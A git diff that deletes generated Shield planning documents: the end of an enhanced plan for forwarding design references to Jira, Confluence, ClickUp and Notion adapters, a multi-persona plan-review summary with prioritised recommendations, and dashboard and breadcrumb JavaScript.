-<pre><code class="language-python">def forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult: ...
-</code></pre>
-<p>where <code>ForwardResult</code> is <code>{created: int, skipped: int, errors: list[ForwardError]}</code>. <code>DesignRef</code> and <code>ForwardResult</code> are defined in <code>shield/adapters/_common/design_refs.py</code> (from EPIC-4-S0).</p>
-<p><strong>Idempotency key:</strong> each <code>DesignRef</code> produces <code>idempotency_key = sha256(story_id + anchor_url)[:32]</code>. Adapters use this as:</p>
-<ul>
-<li>Jira: the <code>globalId</code> field on <code>remote_issue_link</code></li>
-<li>Confluence: the <code>name</code> field on <code>remote_link</code></li>
-<li>ClickUp: the comparison key for URL custom field deduplication before write</li>
-<li>Notion: the comparison key for URL property deduplication before write</li>
-</ul>
-<p><strong>Observability (P1-8):</strong> each forwarded ref emits one <code>action_log</code> entry with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>action='forward_design_ref_failed'</code> with <code>{error_class, http_status, idempotency_key}</code>.</p>
-<p><strong>Tool &amp; access requirements (P1-13):</strong></p>
-<ul>
-<li><strong>Test tenants:</strong> each adapter integration test uses a free-tier sandbox tenant (Confluence Cloud free tier, Jira Cloud free tier, ClickUp free workspace, Notion free workspace) OR uses HTTP mocking via <code>responses</code> library (preferred — credential-free CI).</li>
-<li><strong>Credentials in tests:</strong> when integration tests run live, credentials come from <code>SHIELD_&lt;ADAPTER&gt;_TOKEN</code> env vars; CI defaults to mocked mode.</li>
-<li><strong>Python deps:</strong> Jira → <code>requests</code>; Confluence → <code>requests</code>; ClickUp → existing <code>httpx</code>; Notion → <code>requests</code>. All declared in each adapter's <code>pyproject.toml</code>.</li>
-</ul>
-<p><strong>Idempotency test (P0-4):</strong></p>
-<ul>
-<li>Eval fixture under <code>shield/adapters/&lt;tool&gt;/tests/test_idempotency.py</code> that runs <code>forward_design_refs</code> twice with the same input against a mocked remote and asserts the second call produces 0 <code>created</code> and N <code>skipped</code>.</li>
-</ul>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/commands/pm-sync.md</code> to describe <code>design_refs[]</code> forwarding contract and idempotency key.</li>
-<li>Implement <code>forward_design_refs</code> in each of the four adapter files above.</li>
-<li>Adapters that have no link affordance log <code>'design_refs forwarding skipped — adapter does not support web links'</code> instead of failing.</li>
-<li>Adapter eval fixtures using <code>responses</code> / <code>respx</code> HTTP mocking; <strong>plus the idempotency test from P0-4</strong>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/pm-sync</code> against each of {Confluence, Jira, ClickUp, Notion} forwards <code>design_refs[]</code> URLs on the synced task.</li>
-<li>Running <code>/pm-sync</code> with empty <code>design_refs[]</code> succeeds with no side effect.</li>
-<li>Adapter fixtures pass in <code>shield/evals/</code>.</li>
-<li><strong>(P0-4)</strong> Running <code>/pm-sync</code> twice on the same plan produces no duplicates — verified by per-adapter idempotency test.</li>
-<li><strong>(P0-3)</strong> All four adapters implement the same <code>forward_design_refs(task_id, refs) → ForwardResult</code> signature from <code>shield/adapters/_common/design_refs.py</code>.</li>
-<li><strong>(P1-8)</strong> <code>action_log</code> entries are emitted per ref with the documented fields.</li>
-</ul>
-<hr />
-<h2 id="epic-5--drift--duplication-hardening--m3">EPIC-5 · Drift + duplication hardening · M3</h2>
-<p><em>(unchanged from plan.md — EPIC-5-S1 and EPIC-5-S2 stay as drafted)</em></p>
-<hr />
-<h2 id="out-of-scope-locked">Out of scope (locked)</h2>
-<table>
-<thead>
-<tr>
-<th>Item</th>
-<th>Status</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><code>/lld &lt;component&gt;</code> command</td>
-<td>Template locked at 14 sections per <a href="https://github.com/infraspecdev/tesseract/pull/43">PR #43 sample</a>; authoring command is a separate epic. Typically backend-only.</td>
-</tr>
-<tr>
-<td>Adapter auto-creation of design-doc pages in Confluence/Notion</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Structured ClickUp/Notion relationships beyond URL fields</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Migration tool for existing <code>plan-architecture.md</code></td>
-<td>Direct cutover; files stay readable.</td>
-</tr>
-<tr>
-<td><code>trd_sha</code> content hash (vs commit SHA)</td>
-<td>Deferred (Architect P2). Worth revisiting after M3 ships if <code>last_aligned_with</code> proves insufficient.</td>
-</tr>
-<tr>
-<td><code>template_version</code> field on TRD frontmatter</td>
-<td>Deferred (Architect P2).</td>
-</tr>
-<tr>
-<td>Round-trip integration eval (<code>/plan</code> → <code>/plan-review</code> no Criticals)</td>
-<td>Deferred (Architect P2).</td>
-</tr>
-<tr>
-<td><code>--dry-run</code> mode for <code>/plan</code></td>
-<td>Deferred (SRE P2).</td>
-</tr>
-<tr>
-<td><code>plan-troubleshooting.md</code></td>
-<td>Deferred (SRE P2).</td>
-</tr>
-<tr>
-<td>Concurrent <code>/pm-sync</code> safety (single-writer note)</td>
-<td>Deferred (Backend P2).</td>
-</tr>
-<tr>
-<td>Magic-number defenses for §8 duplication threshold + §7 implementation-manual threshold</td>
-<td>Deferred (Architect P2) — keep as documented constants in EPIC-4-S2 / EPIC-5-S2 tasks.</td>
-</tr>
-<tr>
-<td>Explicit rollback-trigger statement in plan-architecture.md</td>
-<td>Deferred (SRE P1-11) — add to plan-architecture.md in a follow-up commit, not a new story.</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="next-steps">Next steps</h2>
-<p>After applying this enhanced plan (replacing <code>plan.md</code> and updating <code>plan.json</code>):</p>
-<ol>
-<li><strong>Update <code>plan.json</code></strong> to reflect the structural changes (new stories EPIC-1-S4, EPIC-2-S3, EPIC-4-S0; modified ACs/tasks on EPIC-1-S2, EPIC-2-S2, EPIC-3-S1, EPIC-3-S2, EPIC-3-S3, EPIC-4-S1, EPIC-4-S3). Bump M1 milestone exit criteria.</li>
-<li>Re-run <code>/plan-review</code> and confirm composite ≥ B+ (target: 3.0+).</li>
-<li><code>/pm-sync</code> to push updated stories.</li>
-<li><code>/implement</code> starting with <strong>EPIC-4-S0</strong> (adapter scaffolding) or <strong>EPIC-3-S1</strong> (positive eval fixtures) per the RED → GREEN trail.</li>
-</ol>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
deleted file mode 100644
index 9a372339..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
+++ /dev/null
@@ -1,411 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict">Verdict</a>
-</li>
-<li><a href="#score-summary">Score Summary</a>
-</li>
-<li><a href="#p0-recommendations-block-implementation-start">P0 Recommendations (block implementation start)</a>
-</li>
-<li><a href="#p1-recommendations-should-land-in-implementation-milestone">P1 Recommendations (should land in implementation milestone)</a>
-</li>
-<li><a href="#p2-recommendations-nice-to-have">P2 Recommendations (nice to have)</a>
-</li>
-<li><a href="#cross-reviewer-convergence">Cross-reviewer convergence</a>
-</li>
-<li><a href="#detailed-agent-findings">Detailed Agent Findings</a>
-</li>
-<li><a href="#next-steps">Next steps</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-review-plan-trd-refactor">Plan Review: /plan TRD refactor</h1>
-<p><strong>Date:</strong> 2026-05-25
-<strong>Plan:</strong> <code>docs/shield/plan-trd-refactor-20260524/plan.json</code> (+ plan.md, plan-architecture.md)
-<strong>Reviewers:</strong> DX Engineer, Agile Coach, Architect, Backend Engineer, SRE
-<strong>Composite Score:</strong> <strong>B / Ready</strong> (with P0 fixes recommended before implementation)
-<strong>Composite numeric:</strong> 2.77 (weighted: Architect+DX+Backend = 1.0; Agile+SRE = 0.7)</p>
-<h2 id="verdict">Verdict</h2>
-<p>The plan is structurally <strong>ready</strong> — sprint-ready stories, testable ACs, milestone DAG is clean, schema design is well-reasoned, reversibility is documented. But three reviewers (SRE, Backend Engineer, Architect) surfaced <strong>6 P0 recommendations</strong> that should be addressed before implementation starts. The most consequential: the adapter work in <strong>EPIC-4-S3</strong> is materially larger than the plan implies (only 1 of 4 PM-tool adapters exists today as a <code>uv</code> package), and the eval is wired for one-shot PR-body capture rather than recurring CI gating.</p>
-<h2 id="score-summary">Score Summary</h2>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Grade</th>
-<th>Weight</th>
-<th>Numeric</th>
-<th>Key Finding</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Agile Coach</td>
-<td><strong>A-</strong></td>
-<td>0.7</td>
-<td>4</td>
-<td>Sprint-ready: 12/13 points A/A-, milestone DAG clean, all ACs testable</td>
-</tr>
-<tr>
-<td>DX Engineer</td>
-<td><strong>B+</strong></td>
-<td>1.0</td>
-<td>3</td>
-<td>Handoff/specification gaps: section_id heuristic, adapter paths, CI vs PR-body</td>
-</tr>
-<tr>
-<td>Architect</td>
-<td><strong>B</strong></td>
-<td>1.0</td>
-<td>3</td>
-<td>Edge-case completeness: stale &quot;13-section&quot; refs, off-by-N negatives, no stale-anchor detection</td>
-</tr>
-<tr>
-<td>SRE</td>
-<td><strong>C</strong></td>
-<td>0.7</td>
-<td>2</td>
-<td>Runtime safety net missing: no recurring CI gate, no rollback trigger, no provenance stamp</td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td><strong>C+</strong></td>
-<td>1.0</td>
-<td>2</td>
-<td>Adapter contract missing, idempotency undefined, 3 of 4 adapters don't exist as packages</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p0-recommendations-block-implementation-start">P0 Recommendations (block implementation start)</h2>
-<p>These appear with <strong>convergent support across multiple reviewers</strong> — addressing them is the highest-leverage pre-implementation work.</p>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Recommendation</th>
-<th>Origin</th>
-<th>Affected story</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>P0-1</strong></td>
-<td><strong>Fix 14 vs 13 inconsistency across all artifacts.</strong> <code>plan-architecture.md</code> lines 25, 37, 75 still say &quot;13-section&quot;. EPIC-3-S3 AC says &quot;all 13 negatives&quot; but EPIC-3-S2 enumerates 16 negatives (14 missing-section + 1 drift + 1 vague-TBD). Pick a number and propagate everywhere.</td>
-<td>Architect P1 + Backend P0</td>
-<td>EPIC-3-S2, EPIC-3-S3; plan-architecture.md prose</td>
-</tr>
-<tr>
-<td><strong>P0-2</strong></td>
-<td><strong>Split EPIC-4-S3 or add adapter-scaffolding story.</strong> Only <code>shield/adapters/clickup/</code> exists as a <code>uv</code> package today; Jira/Confluence/Notion don't exist. Either split EPIC-4-S3 by adapter (S3a/b/c/d) or add an EPIC-4-S0 that scaffolds <code>pyproject.toml</code>, MCP-server skeleton, tests/, and a shared <code>shield/adapters/_common/design_refs.py</code> for the <code>DesignRef</code> dataclass and <code>forward_design_refs</code> protocol.</td>
-<td>Backend P0 (verified by repo inspection)</td>
-<td>EPIC-4-S3</td>
-</tr>
-<tr>
-<td><strong>P0-3</strong></td>
-<td><strong>Specify the adapter interface contract.</strong> Lock the function signature across all four adapters before implementation: <code>forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult</code> with <code>ForwardResult{created, skipped, errors}</code>. Each <code>DesignRef</code> produces a deterministic idempotency key (<code>sha256(story_id + anchor_url)[:32]</code>) used as <code>globalId</code> for Jira/Confluence remote-links.</td>
-<td>Backend P0</td>
-<td>EPIC-4-S3; new schema doc in <code>sidecar-schema.md</code></td>
-</tr>
-<tr>
-<td><strong>P0-4</strong></td>
-<td><strong>Add idempotency test fixture to EPIC-4-S3.</strong> Add an AC: &quot;Running <code>/pm-sync</code> twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes, no duplicate Notion property writes.&quot; Primary regression guard for the most likely incident shape.</td>
-<td>Backend P0 + Architect P2 (<code>trd_sha</code>)</td>
-<td>EPIC-4-S3, EPIC-2-S2</td>
-</tr>
-<tr>
-<td><strong>P0-5</strong></td>
-<td><strong>Wire eval into recurring CI, not just one-shot PR body.</strong> EPIC-3-S3 says &quot;Wire eval into CI&quot; but the tasks only describe manual PR-body capture. Add a <code>.github/workflows/</code> step that runs <code>uv run shield/evals/run.py plan-trd</code> on every PR touching <code>shield/skills/general/plan-docs/**</code> or <code>shield/schema/**</code>. Without this, the next <code>plan-docs/SKILL.md</code> edit silently breaks the 14-section contract.</td>
-<td>SRE P0 + DX P1</td>
-<td>EPIC-3-S3</td>
-</tr>
-<tr>
-<td><strong>P0-6</strong></td>
-<td><strong>Define mixed-domain failure mode in EPIC-1-S2.</strong> &quot;Mixed → annotate per section&quot; is a single line with no worked example, no eval fixture, no AC. Realistic monorepos (Tesseract itself: <code>pyproject.toml</code> + <code>*.tf</code>) will hit this on day 1. Add: (a) a <code>positive-mixed/</code> fixture under <code>shield/evals/plan-trd/fixtures/</code>, (b) explicit guidance for what &quot;annotate per section&quot; emits, (c) a detection rule (presence of both infra and backend markers).</td>
-<td>SRE P0 + DX P1 + Architect P1 (3 reviewers)</td>
-<td>EPIC-1-S2, EPIC-3-S1</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p1-recommendations-should-land-in-implementation-milestone">P1 Recommendations (should land in implementation milestone)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Recommendation</th>
-<th>Origin</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1-1</td>
-<td><strong>Define <code>section_id</code> heuristic in EPIC-2-S2.</strong> The phrase &quot;story title keyword → TRD section anchor&quot; is a hint, not an algorithm. Specify: &quot;lowercase fuzzy match story.name tokens against TRD section anchor slugs; fall back to §7 high-level-design if no token overlaps.&quot;</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-2</td>
-<td><strong>Define <code>design_refs[]</code> merge semantics in EPIC-2-S2.</strong> &quot;Preserved or updated in place&quot; is ambiguous. Specify: &quot;match by <code>(doc, section_id, component)</code> tuple; replace <code>label</code> if changed, never duplicate keys.&quot;</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-3</td>
-<td><strong>Name adapter file paths in EPIC-4-S3.</strong> Replace &quot;the relevant adapter logic (Python under shield/adapters/)&quot; with explicit per-tool file paths and the function/class to extend in each.</td>
-<td>DX P1 + Agile P2</td>
-</tr>
-<tr>
-<td>P1-4</td>
-<td><strong>Rename or rescope EPIC-3-S3.</strong> Story title says &quot;CI&quot; but tasks describe manual PR-body capture. Either add a workflow YAML task (with file path) or retitle to &quot;Eval execution + RED-GREEN paper trail&quot;.</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-5</td>
-<td><strong>Reconcile domain-detection source.</strong> <code>plan.json</code> EPIC-1-S2 description says &quot;detects the dominant domain from .shield.json + repo markers&quot;; <code>plan.md</code> says only &quot;repo markers&quot;. Pick one and document the config key if <code>.shield.json</code> is in.</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-6</td>
-<td><strong>Add stale-anchor detection to /plan-review.</strong> When a story's <code>design_refs[].anchor_url</code> points at a <code>#section-id</code> no longer present in the live <code>trd.md</code>, <code>/plan-review</code> should report it as a Critical finding. Otherwise sidecar→doc drift goes undetected.</td>
-<td>Architect P1</td>
-</tr>
-<tr>
-<td>P1-7</td>
-<td><strong>Add JSON Schema validator story.</strong> Two version bumps (1.1→1.2→1.3) in one PR series without a machine-readable validator is the drift inflection. Add <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> or <code>jsonschema</code>. Invoked by <code>/plan-review</code> and the eval runner.</td>
-<td>Backend P1</td>
-</tr>
-<tr>
-<td>P1-8</td>
-<td><strong>Specify observability shape for adapter forwarding.</strong> Each <code>design_refs[]</code> forward emits one <code>action_log</code> entry with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>forward_design_ref_failed</code> with <code>{error_class, http_status}</code>.</td>
-<td>Backend P1</td>
-</tr>
-<tr>
-<td>P1-9</td>
-<td><strong>Add deprecation overlap for <code>output-paths.yaml</code>.</strong> Keep <code>plan_arch_md</code> / <code>plan_arch_html</code> keys with <code>deprecated: true</code> rather than removing in M1. Remove in M3 or follow-up PR to protect external consumers of the contract.</td>
-<td>Backend P1</td>
-</tr>
-<tr>
-<td>P1-10</td>
-<td><strong>Add provenance stamp on emitted TRDs.</strong> Top-of-file comment: <code>&lt;!-- generated by /plan vX.Y.Z on YYYY-MM-DD --&gt;</code>. Pairs with <code>last_aligned_with</code> for full drift accountability.</td>
-<td>SRE P1</td>
-</tr>
-<tr>
-<td>P1-11</td>
-<td><strong>Add rollback-trigger statement.</strong> Plan-architecture.md §Rollback should name observable signals that trigger a revert: e.g., (a) eval fails on positive fixtures after merge, (b) &gt;N user-reported broken <code>/plan</code> runs within 48h, (c) downstream <code>/pm-sync</code> adapter errors trace back to schema 1.2.</td>
-<td>SRE P1</td>
-</tr>
-<tr>
-<td>P1-12</td>
-<td><strong>Add version-bump task per CLAUDE.md mandate.</strong> Bump <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> per the &quot;When updating any plugin, bump its version in both...in the same commit&quot; rule. Currently absent from every story.</td>
-<td>SRE P1 + DX P2</td>
-</tr>
-<tr>
-<td>P1-13</td>
-<td><strong>Add tool-and-access requirements subsection.</strong> Which Confluence/Jira/ClickUp/Notion test tenants (or mock client expectations), where credentials live (<code>.shield.json</code>? env vars?), which Python deps the eval pulls.</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-14</td>
-<td><strong>Specify atomic write for <code>/plan</code> output.</strong> If <code>/plan</code> cannot write <code>trd.md</code> (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed.</td>
-<td>SRE P1</td>
-</tr>
-<tr>
-<td>P1-15</td>
-<td><strong>Specify forward-compat policy in <code>sidecar-schema.md</code>.</strong> How does <code>/plan-review</code> handle <code>version: &quot;1.4&quot;</code> from a future Shield? Reject, warn, or accept-with-ignored-fields?</td>
-<td>Backend P1</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p2-recommendations-nice-to-have">P2 Recommendations (nice to have)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Recommendation</th>
-<th>Origin</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P2-1</td>
-<td>Split EPIC-3-S2 into &quot;negative-fixture generator + 14 missing-section fixtures&quot; and &quot;drift + vague-TBD fixtures&quot; for tighter sizing</td>
-<td>Agile P2</td>
-</tr>
-<tr>
-<td>P2-2</td>
-<td>Add CHANGELOG entry / migration-note AC for the cutover</td>
-<td>Agile P2</td>
-</tr>
-<tr>
-<td>P2-3</td>
-<td>Make intra-milestone story <code>depends_on</code> explicit in plan.json</td>
-<td>Agile P2</td>
-</tr>
-<tr>
-<td>P2-4</td>
-<td>Lock the eval runner invocation (drop &quot;or equivalent existing eval runner&quot;)</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-5</td>
-<td>Pick YAML or JSON for the slug allow-list sidecar</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-6</td>
-<td>Add inline <code>design_refs[]</code> JSON example in EPIC-2-S1</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-7</td>
-<td>Add AC for <code>/pm-sync</code> partial-failure behavior (1 of 4 adapters errors)</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-8</td>
-<td>Add &quot;local development&quot; how-to-run note in plan-architecture.md</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-9</td>
-<td>Defend or parameterize magic numbers (&gt;80 char overlap, &gt;20 line code block)</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-10</td>
-<td>Add <code>trd_sha</code> content hash alongside <code>last_aligned_with</code> for true undead-doc detection</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-11</td>
-<td>Add TRD <code>template_version</code> field for legitimate template evolution</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-12</td>
-<td>Add round-trip integration eval (<code>/plan</code> output → <code>/plan-review</code> says no Criticals)</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-13</td>
-<td>Add <code>--dry-run</code> mode for <code>/plan</code> so users validate locally before committing</td>
-<td>SRE P2</td>
-</tr>
-<tr>
-<td>P2-14</td>
-<td>Add a one-page troubleshooting block (<code>plan-troubleshooting.md</code>)</td>
-<td>SRE P2</td>
-</tr>
-<tr>
-<td>P2-15</td>
-<td>Add eval fixture for M2 running on pre-M1 <code>plan-architecture.md</code>-only folders</td>
-<td>SRE P2</td>
-</tr>
-<tr>
-<td>P2-16</td>
-<td>Concurrent <code>/pm-sync</code> note (single-writer until idempotency-key lands)</td>
-<td>Backend P2</td>
-</tr>
-<tr>
-<td>P2-17</td>
-<td>Rate-limit handling note per existing adapter posture</td>
-<td>Backend P2</td>
-</tr>
-<tr>
-<td>P2-18</td>
-<td>Decide fate of this plan's own <code>plan-architecture.md</code> post-M1 (rename or freeze)</td>
-<td>Backend P2</td>
-</tr>
-</tbody>
-</table>
-<h2 id="cross-reviewer-convergence">Cross-reviewer convergence</h2>
-<p>The strongest signal is <strong>convergent flagging</strong> — recommendations cited by 2+ reviewers:</p>
-<table>
-<thead>
-<tr>
-<th>Theme</th>
-<th>Reviewers</th>
-<th>Severity</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Mixed-domain handling (EPIC-1-S2)</td>
-<td>DX, SRE, Architect (3)</td>
-<td>P0</td>
-</tr>
-<tr>
-<td>14 vs 13 inconsistency</td>
-<td>Architect, Backend (2)</td>
-<td>P0</td>
-</tr>
-<tr>
-<td>EPIC-4-S3 adapter file paths</td>
-<td>DX, Agile, Backend (3)</td>
-<td>P0 (escalated)</td>
-</tr>
-<tr>
-<td>CI wiring vs PR-body capture</td>
-<td>DX, SRE (2)</td>
-<td>P0</td>
-</tr>
-<tr>
-<td>Version-bump discipline</td>
-<td>DX, SRE (2)</td>
-<td>P1</td>
-</tr>
-<tr>
-<td>Idempotency / re-run safety</td>
-<td>Architect, Backend (2)</td>
-<td>P0</td>
-</tr>
-</tbody>
-</table>
-<h2 id="detailed-agent-findings">Detailed Agent Findings</h2>
-<ul>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/agile-coach.md">Agile Coach</a> — A-, sprint-readiness focus</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/dx-engineer.md">DX Engineer</a> — B+, handoff/specification gaps</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/architect.md">Architect</a> — B, topology + edge-case completeness</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/backend-engineer.md">Backend Engineer</a> — C+, adapter contract + repo-grounded findings</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/sre.md">SRE</a> — C, runtime safety net</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ol>
-<li>Apply the <strong>enhanced plan</strong> (<a href="../../../../reviews/plan/2026-05-25/enhanced-plan.md">enhanced-plan.md</a>) which carries the P0 fixes and most P1 recommendations</li>
-<li>After applying, re-run <code>/plan-review</code> to confirm composite moves above 3.0 (target: B+/Ready-clean)</li>
-<li>Then <code>/pm-sync</code> to push the updated stories</li>
-<li>Then <code>/implement</code> starting with EPIC-3-S1 (positive eval fixtures) per the RED → GREEN trail</li>
-</ol>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/shield-dashboard.js b/docs/shield/shield-dashboard.js
deleted file mode 100644
index 727f693b..00000000
--- a/docs/shield/shield-dashboard.js
+++ /dev/null
@@ -1,62 +0,0 @@
-// Builds the dashboard card grid + pipeline strip from window.SHIELD_MANIFEST.
-// index.html sits at docs/shield root, so root prefix is "".
-(function () {
-  function el(tag, cls, html) {
-    var e = document.createElement(tag);
-    if (cls) e.className = cls;
-    if (html != null) e.innerHTML = html;
-    return e;
-  }
-  var LINKS = [
-    ["research", "Research", "research.html"],
-    ["prd", "PRD", "prd.html"],
-    ["trd", "TRD", "trd.html"],
-    ["plan_md", "Plan", "plan.html"],
-  ];
-  var PIPELINE = [
-    ["Research", function (a) { return a.research; }],
-    ["PRD", function (a) { return a.prd; }],
-    ["Plan", function (a) { return a.plan_md || a.plan_json; }],
-    ["Implement", function (a, f) { return (f.reviews && f.reviews.code && f.reviews.code.count) > 0; }],
-  ];
-  function card(f) {
-    var c = el("div", "dash-card");
-    var head = el("div");
-    head.appendChild(el("h3", null, f.name));
-    head.appendChild(el("span", "date", f.updated ? f.updated.slice(0, 10) : ""));
-    c.appendChild(head);
-    var pipe = el("div", "pipeline");
-    PIPELINE.forEach(function (p) {
-      var done = !!p[1](f.artifacts || {}, f);
-      pipe.appendChild(el("span", "pipe-step" + (done ? " done" : ""), p[0]));
-    });
-    c.appendChild(pipe);
-    var links = el("div", "dash-links");
-    LINKS.forEach(function (l) {
-      if (f.artifacts && f.artifacts[l[0]]) {
-        var a = el("a", null, l[1]);
-        a.setAttribute("href", f.name + "/outputs/" + l[2]);
-        links.appendChild(a);
-      }
-    });
-    if (f.artifacts && f.artifacts.plan_json) {
-      var aj = el("a", null, "Sidecar JSON");
-      aj.setAttribute("href", f.name + "/plan.json");
-      links.appendChild(aj);
-    }
-    c.appendChild(links);
-    return c;
-  }
-  document.addEventListener("DOMContentLoaded", function () {
-    var mount = document.getElementById("shield-dashboard");
-    if (!mount) return;
-    var features = (window.SHIELD_MANIFEST && window.SHIELD_MANIFEST.features) || [];
-    if (!features.length) {
-      mount.appendChild(el("div", "dash-empty", "No features yet — run /research or /plan to get started."));
-      return;
-    }
-    var grid = el("div", "dash-grid");
-    features.forEach(function (f) { grid.appendChild(card(f)); });
-    mount.appendChild(grid);
-  });
-})();
diff --git a/docs/shield/shield-nav.js b/docs/shield/shield-nav.js
deleted file mode 100644
index 78095491..00000000
--- a/docs/shield/shield-nav.js
+++ /dev/null
@@ -1,160 +0,0 @@
-// Header breadcrumb + filterable Features panel, built from window.SHIELD_MANIFEST.
-// Pure logic (crumbModel, filterFeatures, titleize) is separated from DOM
-// rendering and exported for unit tests (node:test). The DOM bootstrap is
-// guarded by `typeof document`, so requiring this file in Node is safe.
-// No fetch — data comes from manifest.js. file:// safe.
-(function () {
-  var FILE_LABELS = {
-    "prd.html": "PRD", "trd.html": "TRD", "plan.html": "Plan",
-    "research.html": "Research", "plan-architecture.html": "Architecture",
-    "summary.html": "Review", "enhanced-prd.html": "Enhanced PRD",
-    "enhanced-plan.html": "Enhanced Plan", "index.html": "Dashboard",
-  };
-  // artifact key -> [label, path-within-feature, tag]
-  var ARTIFACTS = [
-    ["research", "Research", "outputs/research.html", "research"],
-    ["prd", "PRD", "outputs/prd.html", "prd"],
-    ["trd", "TRD", "outputs/trd.html", "trd"],
-    ["plan_md", "Plan", "outputs/plan.html", "plan"],
-    ["plan_arch_md", "Architecture", "outputs/plan-architecture.html", "arch"],
-    ["plan_json", "Sidecar JSON", "plan.json", "json"],
-  ];
-
-  function titleize(file) {
-    return file.replace(/\.html$/, "").replace(/[-_]/g, " ")
-      .replace(/\b\w/g, function (c) { return c.toUpperCase(); });
-  }
-
-  // Breadcrumb model from a URL path + the page's root prefix.
-  // Returns [{label, href|null, active}].
-  function crumbModel(pathname, root) {
-    var parts = decodeURIComponent(pathname).split("/").filter(Boolean);
-    var file = parts[parts.length - 1] || "index.html";
-    var oi = parts.lastIndexOf("outputs");
-    if (file === "index.html" || oi <= 0) {
-      return [{ label: "Dashboard", href: null, active: true }];
-    }
-    var crumb = [{ label: "Dashboard", href: root + "index.html", active: false }];
-    crumb.push({ label: parts[oi - 1], href: null, active: false });
-    var ri = parts.lastIndexOf("reviews");
-    if (ri !== -1 && ri > oi) {
-      crumb.push({ label: (parts[ri + 1] || "") + " review · " + (parts[ri + 2] || ""), href: null, active: true });
-    } else {
-      crumb.push({ label: FILE_LABELS[file] || titleize(file), href: null, active: true });
-    }
-    return crumb;
-  }
-
-  // Filtered, grouped feature model from the manifest + a search query.
-  // Returns [{name, docs:[{label,href,tag}], reviews:[{label,href}]}].
-  function filterFeatures(manifest, query, root) {
-    var features = (manifest && manifest.features) || [];
-    var q = (query || "").trim().toLowerCase();
-    var out = [];
-    features.forEach(function (f) {
-      var fm = f.name.toLowerCase().indexOf(q) !== -1;
-      var docs = [];
